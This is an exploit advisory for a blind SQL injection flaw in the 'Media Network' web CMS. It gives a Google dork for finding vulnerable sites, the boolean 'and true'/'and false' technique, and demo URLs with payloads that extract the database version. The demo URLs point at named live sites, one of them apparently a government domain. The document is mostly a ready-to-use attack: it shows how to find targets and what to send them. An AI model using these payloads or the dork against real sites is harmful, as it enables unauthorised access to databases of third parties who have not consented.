#Exploit Title: Media Network – Blind Sql Injection Vulnerability
#Date: 2020-08-17
#Exploit Author: Behrouz Mansoori
#Vendor Homepage: http://medianetworkcc.com
#Google Dork: "Powered by Media Network"
#Category:webapps
#Tested On: windows 10, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://nabatieh.gov.lb/t6.php?id=34%20and%20true
* https://nabatieh.gov.lb/t6.php?id=34%20and%20false
* https://nabatieh.gov.lb/t6.php?id=34%20and%20substring(@@version,1,1)=5
### Demo 2:
* http://medianetworkcc.com/preview_news.php?id=54%20and%20true
* http://medianetworkcc.com/preview_news.php?id=54%20and%20false
* http://medianetworkcc.com/preview_news.php?id=54%20and%20substring(@@version,1,1)=1
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email : mr.mansoori@yahoo.com
*********************************************************